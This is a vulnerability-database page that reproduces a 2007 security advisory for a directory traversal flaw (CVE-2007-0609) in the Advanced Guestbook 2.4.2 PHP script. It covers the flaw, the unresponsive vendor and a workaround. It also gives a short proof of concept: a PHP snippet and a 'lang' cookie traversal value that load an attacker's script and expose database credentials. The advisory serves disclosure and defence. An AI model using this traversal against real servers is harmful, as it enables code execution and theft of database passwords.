Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJesper JurcenoksPACKETSTORM:56545
HistoryMay 08, 2007 - 12:00 a.m.

ag-traverse.txt

2007-05-0800:00:00
Jesper Jurcenoks
packetstormsecurity.com
1235

0.059 Low

EPSS

Percentile

92.6%

JSON
`netVigilance Security Advisory #13  
  
Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability   
  
Description:  
Advanced Guestbook is a PHP-based guestbook script. It includes many useful features such as preview, templates, e-mail notification, picture upload, page spanning , html tags handling, smiles, advanced guestbook codes and language support. The admin script lets you modify, view, and delete messages. Requires PHP4 and MySQL.  
External References:   
Mitre CVE: CVE-2007-0609  
NVD NIST: CVE-2007-0609  
OSVDB: 33878  
Summary:   
Advanced Guestbook is a PHP-based guestbook with admin interface.  
Security problems in the product allow attackers to conduct directory traversal attacks.   
This vulnerabilities can be exploited only when attacker has registered on the same server.  
  
Advisory URL:   
http://www.netvigilance.com/advisory0013  
Release Date:  
05/07/2007  
  
Severity:  
Risk: High  
  
CVSS Metrics  
Access Vector: Remote  
Access Complexity: High  
Authentication: Not-required  
Confidentiality Impact: Complete  
Integrity Impact: Complete  
Availability Impact: Complete  
Impact Bias: Normal  
CVSS Base Score: 8  
  
Target Distribution on Internet: Low  
  
Exploitability: Functional Exploit  
Remediation Level: Workaround  
Report Confidence: Uncorroborated   
  
Vulnerability Impact: Attack  
Host Impact: Directory Traversal  
  
  
SecureScout Testcase ID:  
  
  
Vulnerable Systems:  
Advanced Guestbook 2.4.2  
  
Vulnerability Type:  
An attacker via the .. (dot dot) sequence can execute his own php-script on the target server.  
Vendor Status:   
Contact with the Vendor was established but draft of the security advisory wasn't provided because the Vendor stopped responding to our emails on 9 March 2007. There is no official fix at the release of this Security Advisory  
Workaround:  
Set Advanced Guestbook default static language.   
  
Example:   
1. Create php-script like: <?php global $GB_DB; print_r($GB_DB); ?>  
2. Set in COOKIES variable lang = "[ via the .. (dot dot) Sequence set the script name on the same server]" for example "../../../hack_www/htdocs/hack"  
REQUEST:  
http://[TARGET]/[guestbook-directory]/index.php  
REPLY:  
Array  
(  
[dbName] => [CURRENT DB NAME]  
[host] => [CURRENT DB HOST]  
[user] => [DB USER NAME]  
[pass] => [DB USER PASSWORD]  
)  
  
Credits:   
Jesper Jurcenoks  
Co-founder netVigilance, Inc  
www.netvigilance.com  
  
`

Related

prion 1
securityvulns 2
cve 1
nessus 1
prion
prion
Directory traversal
2007-05-09 17:19:00
securityvulns
securityvulns
[Full-disclosure] Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability
2007-05-08 00:00:00
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2007-05-08 00:00:00
cve
cve
CVE-2007-0609
2007-05-09 17:19:00
nessus
nessus
Advanced Guestbook index.php lang Cookie Parameter Path Disclosure
2007-05-09 00:00:00

0.059 Low

EPSS

Percentile

92.6%

JSON
Related for PACKETSTORM:56545
prion1securityvulns2cve1nessus1